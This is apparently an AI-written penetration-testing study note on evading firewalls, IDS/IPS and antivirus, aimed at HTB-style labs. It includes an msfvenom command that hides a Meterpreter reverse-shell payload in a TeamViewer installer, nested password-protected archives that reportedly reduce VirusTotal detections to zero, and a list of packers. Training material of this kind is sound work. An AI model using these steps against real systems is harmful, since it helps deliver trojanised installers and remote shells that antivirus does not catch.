🛡️ Firewall and IDS/IPS Evasion

---

🔐 Defense Layers: Endpoint vs. Perimeter Protection

🧍 Endpoint Protection

Protects individual hosts (e.g., PC, server, workstation).

🧰 Common components:

• Antivirus (e.g., Avast, BitDefender)

• Antimalware (e.g., Malwarebytes)

• Host-based Firewall

• Anti-DDoS tools

🌐 Perimeter Protection

Guards the network edge using physical or virtual appliances.

🏰 Key zones:

• Outside: Public internet

• DMZ (De-Militarized Zone): Public-facing servers

• Inside: Private/internal systems

---

📋 Security Policies

Similar to Access Control Lists (ACLs), policies are made of allow and deny rules.

🔒 Categories:

• Network Traffic

• Application Behavior

• User Access Control

• File Permissions

• DDoS Mitigation

---

🧠 Detection Methods

Type	Description
Signature-Based	Matches known attack patterns
Heuristic/Statistical	Detects anomalies from network baseline
Stateful Protocol Analysis	Compares traffic to protocol norms
Live Monitoring (SOC)	Human/automated real-time monitoring

---

🕵️‍♂️ Evasion Techniques

🎭 Signature-Based AV Bypass

• AV engines scan files/processes for known signatures

• Detected threats are quarantined or terminated

💡 Evade with MSFVenom AES Tunneling

🔒 Meterpreter sessions support AES encryption for communication, protecting against:

• Network-based IDS/IPS

• Traffic inspection tools

Still vulnerable to static file scanning pre-execution.

---

🧬 Using Executable Templates

🎯 Embed payloads in legitimate executables (e.g., installers):

$ msfvenom -p windows/x86/meterpreter_reverse_tcp \
  LHOST=10.10.14.2 LPORT=8080 -k \
  -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -i 5 \
  -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe

📝 Flags:

• -k → Keep original behavior

• -x → Use custom executable

• -e → Encode (e.g., x86/shikata_ga_nai)

• -i → Encode iterations

---

📦 Packing with Archives

⚙️ Password-protecting a file within nested archives helps bypass signature detection.

Steps:

1. Create archive:

   $ rar a ~/test.rar -p ~/test.js

2. Rename archive:

   $ mv test.rar test

3. Nest again & rename:

   $ rar a test2.rar -p test
   $ mv test2.rar test2

---

🧪 Testing Against VirusTotal

🧰 Submit via:

$ msf-virustotal -k <API_KEY> -f test2

🎯 Result

• Initial test.js file → Detected by ~11/59 AV engines

• Final test2 file (double archived) → 0 detections 🚫

🔗 VirusTotal

---

🧳 Packers

A packer compresses an executable with decompression logic to:

• Obfuscate contents

• Avoid AV file scanning

🧰 Popular packers:

• UPX

• MPRESS

• The Enigma Protector

• Themida

• ExeStealth

🔍 Learn more: PolyPack Project

---

🧑‍💻 Exploit Coding & Obfuscation

To avoid detection, write customized, non-patterned exploit code.

Example:

'Targets' => [
  ['Windows 2000 SP4 English', { 'Ret' => 0x77e14c29, 'Offset' => 5093 }],
],

🔥 Avoid:

• Obvious NOP sleds

• Static buffer patterns

• Reuse of popular signatures

🛠️ Test custom exploits in a sandboxed lab before deployment.

---

📚 Further Reading

• 📘 Metasploit: The Penetration Tester’s Guide (No Starch Press)

• 🧪 Try these techniques on HTB boxes or old AV environments

• 🧰 MSFVenom Payload Generator Cheat Sheet

---

Let me know if you’d like this saved as a downloadable .md file or used to create a full presentation!